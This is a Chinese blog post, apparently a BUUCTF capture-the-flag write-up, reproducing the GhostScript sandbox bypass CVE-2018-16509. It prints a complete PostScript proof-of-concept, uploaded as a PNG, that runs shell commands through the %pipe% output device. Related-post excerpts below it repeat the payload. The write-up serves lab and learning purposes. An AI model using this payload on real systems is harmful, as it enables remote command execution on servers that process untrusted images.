buuctf [GhostScript]CVE-2018-16509

最新推荐文章于 2024-05-20 17:06:31 发布
最新推荐文章于 2024-05-20 17:06:31 发布
阅读量582 收藏 1
点赞数 1
分类专栏: buuctf real 文章标签: ghostscript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/115359495
版权

漏洞描述

GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。
https://blog.csdn.net/JiangBuLiu/article/details/95061202

漏洞影响

Ghostscript 9.24之前版本

漏洞复现

在这里插入图片描述

直接上传一个png打poc

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops

在这里插入图片描述
打印环境变量
在这里插入图片描述
拿到flag!

exploitsec
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Vulnhub复现漏洞 - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509
JiangBuLiu的博客
07-08 2025
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POC Vulnhub官方复现教程 https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/ 漏洞原理 GhostScript 被许多图片处理库所使用,如 ImageMagick、Pyt...
GhostScript沙箱绕过(命令执行漏洞)CVE-2018-16509
她叫常玉莹
07-27 1017
2018年8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 访问http://192.168.0.104:8080上传poc.png 执行id > /tmp/succ
Python 渗透测试:GhostScript 沙箱绕过.(CVE-2018-16509
最新发布
网络安全领域___专研者.
05-20 585
GhostScript 沙箱是一种安全机制,用于在受控环境中运行 GhostScript 解释器,以防止恶意代码的执行。GhostScript 是一个广泛使用的 PDF 和 PostScript 解释器,通常用于在服务器上处理和渲染这些文件格式。但是,GhostScript 也可能存在安全漏洞,攻击者可以利用这些漏洞来执行任意代码。GhostScript 沙箱就是为了解决这个问题而设计的。它将 GhostScript 解释器置于一个受限的执行环境中,限制其访问系统资源的能力。这样可以防止恶意代码在 Ghos
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509
EC_Carrot的博客
06-06 209
漏洞背景 2018年8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 影响范围 Artifex Ghostscript 9.24之前版本 漏洞复现 先下载Poc图片,源码: %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stoppe
【漏洞靶场】--GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509
hello word的博客
01-06 2207
环境 exp 把如下代码保存为一个png文件。 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%ls / > /tmp/success && cat /tmp/success) currentdevice putdeviceprops 上传,执行l
ghostscript-9.26-bin
10-12
标题中的"ghostscript-9.26-bin"指的是Ghostscript的9.26版本的二进制发行版,这个版本包含了可执行文件和其他必要的动态链接库(.so文件),使得用户能够在不同的平台上运行和处理PostScript和PDF文件。 ...
ghostscript-9.02.tar.gz
09-03
ghostscript-9.02,用于linux中pdf转图片工具
Ghostscript fonts-开源
05-01
字体和字体指标通常随Ghostscript一起分发。 当前包括35种标准PostScript字体和其他字体。
ghostscript-9.27-linux-x86_64.tgz
06-19
Python 读取PDF图片所需资源,ghostscript-9.27-linux-x86_64.tgz
ghostscript-9.27-1.el8.x86_64.rpm
12-06
离线安装包,亲测可用
CVE-2018-11759:显示如何利用CVE-2018-11759的概念证明
03-19
概念验证 描述 特定于Apache Web服务器(httpd)的代码在将请求的路径与Apache Tomcat JK(mod_jk)连接器1.2.0至1.2.44中的URI-worker映射进行匹配之前对其进行了规范化,无法正确处理某些边缘情况。如果仅通过httpd公开了Tomcat支持的URL的子集,则特殊构造的请求可能会通过反向代理公开应用程序功能,而该功能不适用于客户端通过反向代理访问应用程序。在某些配置中,特殊构造的请求也有可能绕过httpd中配置的访问控制。尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC 以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。 环境设定 docker-compose up -d 请耐心等待,第一次的过程可能会很长。 运行后,可通过以下地址访问易受攻击的代理 开发 可以将使用mod
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509
qq_51577576的博客
12-07 723
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509 CVE-2018-16509是由于GhostScript在处理/invalidaccess异常时,程序没有正确的检测restoration of privilege(权限恢复),导致攻击者可通过提交特制的PostScript利用该漏洞执行代码。
[春秋云镜]CVE-2018-16509
niubi707的博客
12-02 5314
春秋云镜CVE-2018-16509GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 Python 中处理图片的模块 PIL(Pillow),因为其内部调用了 GhostScript 而受到 CVE-2018-16509的影响
buuctf [GhostScript]CVE-2018-19475
qq_1873822的博客
03-30 435
漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 ./psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限
复现vulhub中ghostscriptCVE-2018-16509漏洞
YX_zjp的博客
03-03 364
使用腾讯云轻量服务器安装vulhub。系统:ubuntu20.04。可以看到相关端口是8080。done表示环境已开启。
GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-16509 漏洞复现
ADummy的博客
02-24 326
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509) by ADummy 0x00利用路线 ​ 构造poc png图片—>上传图片—>有回显命令执行 0x01漏洞介绍 ​ 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞: http://seclists.org/oss-sec/2018/q3/142 https://b
vulhub中ghostscriptcve-2018-16509漏洞复现记录
xeeyuuuu的博客
04-08 576
该漏洞在kali环境中复现,首先进入CVE-2018-16509目录,开启docker-compose环境 开启漏洞环境命令: ​ docker-compose build ​ docker-compose up -d 参考:https://blog.csdn.net/qq_41901122/article/details/107978142 访问该地址,可以看到有文件上传的途径 端口8080 poc:poc.png poc地址:https://github.com/vulhub/vulhub/blob
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值